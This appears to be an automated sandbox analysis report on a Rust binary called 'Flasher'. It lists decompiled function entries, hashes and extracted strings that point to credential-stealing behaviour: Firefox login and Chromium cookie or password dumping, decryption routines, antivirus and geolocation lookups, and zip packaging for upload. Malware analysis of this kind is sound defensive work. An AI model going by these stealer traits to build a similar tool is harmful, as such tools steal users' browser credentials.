                                                                      • String ID: C:\Users\user1\.cargo\registry\src\index.crates.io-6f17d22bba15001f\hyper-0.14.25\src\proto\h2\client.rs$($APPDATAsrc\firefox\firefox.rs$a Display implementation returned an error unexpectedly/rustc/90b35a6239c3d8bdabc530a6a0816f7ff89a0aaf\library\alloc\src\string.rs$called `Result::unwrap()` on an `Err` value$logi$loginsstruct LoginFilestruct LoginFile with 1 element
                                                                      • API String ID: 3396608759-2528929634
                                                                      • Opcode ID: 4e8803e9d7ca1e5dc0475faaa10482a8fc7b32e9d378250fa87d3d0c8fb26494
                                                                      • Instruction ID: aea6e21d75468462e233fd4832e4d81c9fbd099833e1fe2eeb3efa95910e378f
                                                                      • Opcode Fuzzy Hash: 4e8803e9d7ca1e5dc0475faaa10482a8fc7b32e9d378250fa87d3d0c8fb26494
                                                                      • Instruction Fuzzy Hash: 40834732A09BC681E6719F15E4453EEB3A0FB98784F445226DACDA3B59DF3CD1A5CB00
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: C:\Users\user1\.cargo\registry\src\index.crates.io-6f17d22bba15001f\hyper-0.14.25\src\proto\h2\client.rs$,!_k$-NoProfile-NonInteractive-NoLogo-CommandGet-Culture | Select -ExpandProperty DisplayName$Must not use a decoder that has finished.$\\?\fatal runtime error: I/O error: operation failed to complete synchronously$a Display implementation returned an error unexpectedly/rustc/90b35a6239c3d8bdabc530a6a0816f7ff89a0aaf\library\alloc\src\string.rs$asn$assertion failed: nsec >= 0 && nsec < NSEC_PER_SECC:\Users\user1\.cargo\registry\src\index.crates.io-6f17d22bba15001f\time-0.1.45\src\lib.rs$c/main.rs$called `Result::unwrap()` on an `Err` value$city$connectioncontent-dispositioncontent-encodingcontent-languagecontent-lengthcontent-locationcontent-rangecontent-security-policycontent-security-policy-report-onlycontent-typecookiedntdateetagexpectexpiresforwardedfromif-matchif-modified-sinceif-none-matchif-ra$country$entInvalidParameterCountSqlInputErrorsql$hell.exe$isp$nown$postal$powershe$root\SecurityCenter2$timezoneutc$um\decryption_core.rs$yHql_`%
                                                                      • API String ID: 0-790126852
                                                                      • Opcode ID: d05a3b469977879c1add518210cd4d69a33ef7223e2e55af47877e8ceecc8f78
                                                                      • Instruction ID: 4dcdd350e6dc6f55087c2559812692f6e5e237600cbf247a776db3685dd9faae
                                                                      • Opcode Fuzzy Hash: d05a3b469977879c1add518210cd4d69a33ef7223e2e55af47877e8ceecc8f78
                                                                      • Instruction Fuzzy Hash: EA937A76609FC589EB219F24D8413EC73A4FB48B88F448136DA9D9BB99DF38D265C340
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: memmovestrlen
                                                                      • String ID: %s constraint failed$%z: %s$-- %s$SELECT*FROM"%w".%s WHERE %s ORDER BY rowid$ValueList$abort at %d in [%s]: %s$cannot change %s wal mode from within a transaction$cannot commit - no transaction is active$cannot commit transaction - SQL statements in progress$cannot open savepoint - SQL statements in progress$cannot release savepoint - SQL statements in progress$cannot rollback - no transaction is active$cannot start a transaction within a transaction$cannot store %s value in %s column %s.%s$database schema has changed$database table is locked: %s$index corruption$into$no such savepoint: %s$out of$out of memory$sqlite_master$statement aborts at %d: [%s] %s$string or blob too big$too many levels of trigger recursion
                                                                      • API String ID: 3405231851-3554755949
                                                                      • Opcode ID: f1b5273c79bcae0a933582b0fde27c8669990e5c8a41d02dd42129342c4c25d9
                                                                      • Instruction ID: 6f90c5cdf9732ba4956b4dc1cc7dec8b192acbdec26f96d77de4941db11ca84f
                                                                      • Opcode Fuzzy Hash: f1b5273c79bcae0a933582b0fde27c8669990e5c8a41d02dd42129342c4c25d9
                                                                      • Instruction Fuzzy Hash: 25E3F332A09B8282EBA4CF26D15667DA7B4FF44B84F055037DE4EA7794DE39E920C704
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Free$Heap$memmove$Stringmemcmp
                                                                      • String ID: CurrentHorizontalResolutionCurrentVerticalResolution$Must not use a decoder that has finished.$Name$Name$SerialNu$SerialNumber-NoProfile-NonInteractive-NoLogo-CommandGet-Culture | Select -ExpandProperty DisplayName$\\?\fatal runtime error: I/O error: operation failed to complete synchronously$asn$called `Result::unwrap()` on an `Err` value$city$connectioncontent-dispositioncontent-encodingcontent-languagecontent-lengthcontent-locationcontent-rangecontent-security-policycontent-security-policy-report-onlycontent-typecookiedntdateetagexpectexpiresforwardedfromif-matchif-modified-sinceif-none-matchif-ra$country$hell.exe$isp$nown$nown$postal$powershe$timezoneutc$um\decryption_core.rs
                                                                      • API String ID: 4157402187-1807458916
                                                                      • Opcode ID: afa1f8b53feb4375c0cbc07be99dfac8596dac78049520607d2594faeaee48e0
                                                                      • Instruction ID: 9552d0dca387ec6b6751248199f7e57bcc429ce4d1574630d10ea8504b0a290c
                                                                      • Opcode Fuzzy Hash: afa1f8b53feb4375c0cbc07be99dfac8596dac78049520607d2594faeaee48e0
                                                                      • Instruction Fuzzy Hash: 1D439E76A09BC585E7318F25D8413ECB3A4FB49788F404236DA9DABB95DF38D2A5C340
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FreeHeap$memmove$CloseFind
                                                                      • String ID: $*$6YpEmw$APPDATAsrc\firefox\firefox.rs$\...C:\Users\user1\.cargo\registry\src\index.crates.io-6f17d22bba15001f\zip-0.5.13\src\write.rs$called `Result::unwrap()` on an `Err` value$x.crates.io-6f17d22bba15001f\hyper-0.14.25\src\body\to_bytes.rs
                                                                      • API String ID: 1769694607-2013108120
                                                                      • Opcode ID: 9d9a727204980dd7c2a98780cf179ae06e8743245e9c50a643215caf88d6c941
                                                                      • Instruction ID: 5ffa8d4913b62712cba4c99a3154ed00e39adab6e00d65689f8b87ade5c304e5
                                                                      • Opcode Fuzzy Hash: 9d9a727204980dd7c2a98780cf179ae06e8743245e9c50a643215caf88d6c941
                                                                      • Instruction Fuzzy Hash: 98533872A09BC581E6B19F11E4413EEB3A4FB89784F444136DA8DA3B59DF3CE1A5CB40
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Heap$Free$memmove$Time$CloseFileHandlePreciseProcessSystemmemcmp
                                                                      • String ID: APPDATAsrc\firefox\firefox.rs$No file has been started$Should have switched to stored beforehand$TEMPsrc\misc\sensitive_data.rs$c\index.crates.io-6f17d22bba15001f\reqwest-0.11.16\src\lib.rs$called `Result::unwrap()` on an `Err` value$corrupt contentsUtf16ErrorInternalMalfunctionOperationAbortedDatabaseBusyDatabaseLockedReadOnlyOperationInterruptedSystemIoFailureDatabaseCorruptDiskFullCannotOpenFileLockingProtocolFailedSchemaChangedTooBigConstraintViolationTypeMismatchApiMisuseNoLargeFileSu$julian_day$overflow adding duration to date$overflow subtracting duration from date$qlkb$resulting value is out of range$tementChangedRowsToSqlConversionFailureInvalidQueryMultipleStatementInvalidParameterCountSqlInputErrorsql
                                                                      • API String ID: 4080725345-3226067970
                                                                      • Opcode ID: a7cb5f8bcd9c473ea62c638a0a4e83f1964d2fd181fe8c4c76353832d42ce174
                                                                      • Instruction ID: 36ef2a92b561ce2ff43d82a5b4741c80e00ec1c5779b2778cd2408384750501f
                                                                      • Opcode Fuzzy Hash: a7cb5f8bcd9c473ea62c638a0a4e83f1964d2fd181fe8c4c76353832d42ce174
                                                                      • Instruction Fuzzy Hash: 3B436F72A09BC581EB619F11E4463EEB3A4FB88784F448136DA9D93B59DF3CE1A5C700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CloseFreeHandleHeap
                                                                      • String ID: %APPDATA%$,!_k$APPDATAsrc\firefox\firefox.rs$c/main.rs$yHql_`%
                                                                      • API String ID: 1642312469-2003922457
                                                                      • Opcode ID: e9d2454bf2720e774b7628b9a17d7f842daf30fbfb7654919174eca0ff92c58b
                                                                      • Instruction ID: c1654fb467008c9d8b2b424b4584240fe121311d20634d89329b44366f778afb
                                                                      • Opcode Fuzzy Hash: e9d2454bf2720e774b7628b9a17d7f842daf30fbfb7654919174eca0ff92c58b
                                                                      • Instruction Fuzzy Hash: 40E27C36A05FC685EB619F25D8412EDB3A0FB48B84F448137DA5DABB99DF39D261C300
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FreeHeap$memmove
                                                                      • String ID: %APPDATA%$,!_k$APPDATAsrc\firefox\firefox.rs$c/main.rs$yHql_`%
                                                                      • API String ID: 2650465384-2003922457
                                                                      • Opcode ID: aba33f35a395cb949c3a841cdce4bc99183667b051e3af8a5f42bfefac441b4a
                                                                      • Instruction ID: 3beb82e95c04da9afb7ac09205c2ebd1978221bff24b69b7bdeb10ae5c0ec8ba
                                                                      • Opcode Fuzzy Hash: aba33f35a395cb949c3a841cdce4bc99183667b051e3af8a5f42bfefac441b4a
                                                                      • Instruction Fuzzy Hash: CED29D76605FC689EB619F25D8412ED73A0FB88B84F048137DA5DABB99DF38D261C300
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: memmove$Heap$Free$memcmp$Process
                                                                      • String ID: @$FALSETRUEUNKNOWN$LOCALAPPDATAsrc\chromium\dumper.rs$User Dat$\...C:\Users\user1\.cargo\registry\src\index.crates.io-6f17d22bba15001f\zip-0.5.13\src\write.rs$called `Result::unwrap()` on an `Err` value$ghijklmnopqrstuvwxyz0123456789$ingInvalidCharsetInvalidDateTimeDerConstraintFailedLifetimeErrorIncompleteNomErrordepthSqliteFailureSqliteSingleThreadedModeFromSqlConversionFailureIntegralValueOutOfRangeInvalidParameterNameInvalidPathExecuteReturnedResultsQueryReturnedNoRowsInvalidColumnInde$lid UTF-8 sequence in column nameC:\Users\user1\.cargo\registry\src\index.crates.io-6f17d22bba15001f\rusqlite-0.28.0\src\column.rs$os_cryptstruct LocalStatestruct LocalState with 1 element$ptyNullPointerResultUnimplementedArrayItemInvalidDeserializationVariantErrorBerTypeErrorBerValueErrorInvalidLengthInvalidValuetagInvalidTagUnknownTagUnexpectedTagexpectedactualUnexpectedClassIndefiniteLengthUnexpectedConstructExpectedConstructUnexpectedInteger$ractive-NoLogo-CommandGet-Culture | Select -ExpandProperty DisplayName$user1\.cargo\registry\src\index.crates.io-6f17d22bba15001f\serde_json-1.0.95\src\de.rs$!G$r0"$1"
                                                                      • API String ID: 3959763608-3636698432
                                                                      • Opcode ID: 514279ca581177360aad81b4dbfbd93ba246cf034cb7fc79d285ac82070163c0
                                                                      • Instruction ID: 0969f2b2a3915b014530cd9ae6207db28f856da4cd6cba2eb7d70279fa5d4b0b
                                                                      • Opcode Fuzzy Hash: 514279ca581177360aad81b4dbfbd93ba246cf034cb7fc79d285ac82070163c0
                                                                      • Instruction Fuzzy Hash: 20139176608B8681EB219F21E4523EEB764FB88B84F858033DA9D97799DF3DD521C700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FreeHeapmemmove
                                                                      • String ID: /scheme and authority is valid Uri$Pending error polled more than once$cookie2$httphttpsfile://C:\Users\user1\.cargo\registry\src\index.crates.io-6f17d22bba15001f\url-2.3.1\src\parser.rs$valid request parts
                                                                      • API String ID: 913535592-164153490
                                                                      • Opcode ID: efed3eb55699a0e2de158116223bd67f5029f52520c5e30ecf0768d2863680ca
                                                                      • Instruction ID: 6b0dd5caf1513e83e771d6645e3dd1903345f6e3ecc8d384d4df151dcbc248f7
                                                                      • Opcode Fuzzy Hash: efed3eb55699a0e2de158116223bd67f5029f52520c5e30ecf0768d2863680ca
                                                                      • Instruction Fuzzy Hash: BFE29D62A0CBC581EA61CB15E4463EEB360FB89B88F445126DF8D67B5ADF3CE195C700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: memmove
                                                                      • String ID: called `Result::unwrap()` on an `Err` value$char$charset$rset$utf-8
                                                                      • API String ID: 2162964266-3032185218
                                                                      • Opcode ID: 2fa184bd21a3f7790df7821f05765b193702630b421f944819406471e3057dd4
                                                                      • Instruction ID: 305c866c450bb982fae829758d4247aab5f65c4184110cad462aff6fb1dbb2e3
                                                                      • Opcode Fuzzy Hash: 2fa184bd21a3f7790df7821f05765b193702630b421f944819406471e3057dd4
                                                                      • Instruction Fuzzy Hash: 3FB2C136A09ACA85EB348B25D9023FCA3A1FB05784F444133DA5DABB95CF7DE665C340

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 14935 7ff6d35fdb71-7ff6d35fdb8e 14936 7ff6d35fdb94-7ff6d35fdbb0 CreateIoCompletionPort 14935->14936 14937 7ff6d35fdf00-7ff6d35fdf09 call 7ff6d35f570b 14935->14937 14939 7ff6d35fe191-7ff6d35fe1a1 GetLastError 14936->14939 14940 7ff6d35fdbb6-7ff6d35fdbce call 7ff6d35efed0 14936->14940 14945 7ff6d35fe3a0 14937->14945 14946 7ff6d35fdf0f-7ff6d35fdf1e 14937->14946 14941 7ff6d35fe2f6-7ff6d35fe2fa 14939->14941 14950 7ff6d35fdbd4-7ff6d35fdbeb 14940->14950 14951 7ff6d35fe3be-7ff6d35fe3c8 call 7ff6d373420a 14940->14951 14944 7ff6d35fe301-7ff6d35fe314 14941->14944 14948 7ff6d35fe3a2-7ff6d35fe3aa call 7ff6d37341f0 14945->14948 14949 7ff6d35fdf21-7ff6d35fdf5c memmove * 2 14946->14949 14958 7ff6d35fe3af-7ff6d35fe3b9 call 7ff6d37341f0 14948->14958 14954 7ff6d35fe085-7ff6d35fe08a 14949->14954 14955 7ff6d35fdf62-7ff6d35fdf8b call 7ff6d35efcd0 call 7ff6d35efed0 14949->14955 14950->14945 14956 7ff6d35fdbf1-7ff6d35fdc06 call 7ff6d35efed0 14950->14956 14960 7ff6d35fe3cd-7ff6d35fe3d7 call 7ff6d373420a 14951->14960 14959 7ff6d35fe08f-7ff6d35fe18c memmove * 2 14954->14959 14955->14958 14972 7ff6d35fdf91-7ff6d35fdfbb 14955->14972 14956->14960 14967 7ff6d35fdc0c-7ff6d35fdc55 14956->14967 14958->14951 14959->14944 14968 7ff6d35fe3dc call 7ff6d3531430 14960->14968 14967->14945 14970 7ff6d35fdc5b-7ff6d35fdc6e 14967->14970 14974 7ff6d35fe3e1-7ff6d35fe3e9 call 7ff6d37341f0 14968->14974 14970->14945 14973 7ff6d35fdc74-7ff6d35fddfc call 7ff6d35f8f21 * 19 memset 14970->14973 14975 7ff6d35fdfbd-7ff6d35fdfef memset 14972->14975 15017 7ff6d35fde01-7ff6d35fde14 14973->15017 14975->14975 14978 7ff6d35fdff1-7ff6d35fe083 14975->14978 14978->14959 15018 7ff6d35fe394-7ff6d35fe39b call 7ff6d3734b10 15017->15018 15019 7ff6d35fde1a-7ff6d35fde29 15017->15019 15018->14945 15019->15018 15021 7ff6d35fde2f-7ff6d35fde48 15019->15021 15021->15017 15022 7ff6d35fde4a-7ff6d35fde6c memmove 15021->15022 15023 7ff6d35fde71-7ff6d35fde7d 15022->15023 15023->14945 15024 7ff6d35fde83-7ff6d35fde92 15023->15024 15024->15023 15025 7ff6d35fde94-7ff6d35fdeb6 memmove 15024->15025 15025->14968 15026 7ff6d35fdebc-7ff6d35fded0 15025->15026 15026->14968 15027 7ff6d35fded6-7ff6d35fded9 15026->15027 15028 7ff6d35fdedf-7ff6d35fdeea call 7ff6d35efed0 15027->15028 15029 7ff6d35fe1a6-7ff6d35fe1ab 15027->15029 15032 7ff6d35fdeef-7ff6d35fdef2 15028->15032 15031 7ff6d35fe1ad-7ff6d35fe1c4 15029->15031 15033 7ff6d35fe1e2-7ff6d35fe1e5 15031->15033 15034 7ff6d35fe1c6-7ff6d35fe1ca 15031->15034 15032->14948 15035 7ff6d35fdef8-7ff6d35fdefb 15032->15035 15037 7ff6d35fe38d 15033->15037 15038 7ff6d35fe1eb 15033->15038 15036 7ff6d35fe1cd-7ff6d35fe1db 15034->15036 15035->15031 15036->15036 15039 7ff6d35fe1dd-7ff6d35fe1e0 15036->15039 15037->15018 15040 7ff6d35fe1f0-7ff6d35fe204 15038->15040 15039->15040 15041 7ff6d35fe234-7ff6d35fe246 15040->15041 15042 7ff6d35fe206-7ff6d35fe229 call 7ff6d3577380 15040->15042 15044 7ff6d35fe315-7ff6d35fe388 memmove * 4 15041->15044 15045 7ff6d35fe24c-7ff6d35fe266 call 7ff6d35efed0 15041->15045 15042->14974 15048 7ff6d35fe22f 15042->15048 15044->14949 15045->14948 15050 7ff6d35fe26c-7ff6d35fe2ab memmove * 2 15045->15050 15048->15041 15050->14941 15051 7ff6d35fe2ad-7ff6d35fe2f0 memmove * 2 15050->15051 15051->14941 15051->14949
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: memmove$memset$CompletionCreateErrorHeapLastPortProcess
                                                                      • String ID:
                                                                      • API String ID: 1539442803-0
                                                                      • Opcode ID: 9b91af264cb77f406256b59a67414cc4c644c442582dbe0d8b68626fb21a7b0e
                                                                      • Instruction ID: 013ef343a4ae5342813b0a7e3583bbdea58041c76702da1767f8be631dabc869
                                                                      • Opcode Fuzzy Hash: 9b91af264cb77f406256b59a67414cc4c644c442582dbe0d8b68626fb21a7b0e
                                                                      • Instruction Fuzzy Hash: 67227232A09BC581E7609B25E4463AEB3A1FB85784F149136DBDD9379ADF3CE1A0C700
                                                                      APIs
                                                                      Strings
                                                                      • No file has been started, xrefs: 00007FF6D3529DB5
                                                                      • C:\Users\user1\.cargo\registry\src\index.crates.io-6f17d22bba15001f\hyper-0.14.25\src\proto\h2\client.rs, xrefs: 00007FF6D352A687
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FreeHeap$CloseHandle$memmove
                                                                      • String ID: C:\Users\user1\.cargo\registry\src\index.crates.io-6f17d22bba15001f\hyper-0.14.25\src\proto\h2\client.rs$No file has been started
                                                                      • API String ID: 4256591341-713680693
                                                                      • Opcode ID: 417b25d7ced5010478a5e0c224f22a4d48cea39c61df3d77def7355de9550a2a
                                                                      • Instruction ID: 3e5e1ce9239eb627c87d5b6a308f282f83b0ed30daabfa2e2e15f87b51c51443
                                                                      • Opcode Fuzzy Hash: 417b25d7ced5010478a5e0c224f22a4d48cea39c61df3d77def7355de9550a2a
                                                                      • Instruction Fuzzy Hash: 7712C136A09AC688E7709F21D8463ED73A1FB45B88F444037DA0DABB99CF79D265C340
                                                                      APIs
                                                                      Strings
                                                                      • httphttpsfile://C:\Users\user1\.cargo\registry\src\index.crates.io-6f17d22bba15001f\url-2.3.1\src\parser.rs, xrefs: 00007FF6D35C06D9, 00007FF6D35C0704, 00007FF6D35C0E19
                                                                      • HTTP_PROXYhttp_proxyHTTPS_PROXYhttps_proxyREQUEST_METHODSoftware\Microsoft\Windows\CurrentVersion\Internet SettingsProxyEnableProxyServer=, xrefs: 00007FF6D35C06E0
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FreeHeap
                                                                      • String ID: HTTP_PROXYhttp_proxyHTTPS_PROXYhttps_proxyREQUEST_METHODSoftware\Microsoft\Windows\CurrentVersion\Internet SettingsProxyEnableProxyServer=$httphttpsfile://C:\Users\user1\.cargo\registry\src\index.crates.io-6f17d22bba15001f\url-2.3.1\src\parser.rs
                                                                      • API String ID: 3298025750-1061000415
                                                                      • Opcode ID: 7cd5136b3e42d234a67513e18849590ffb5a2aa6941adb03c3e0e7bc223c34dc
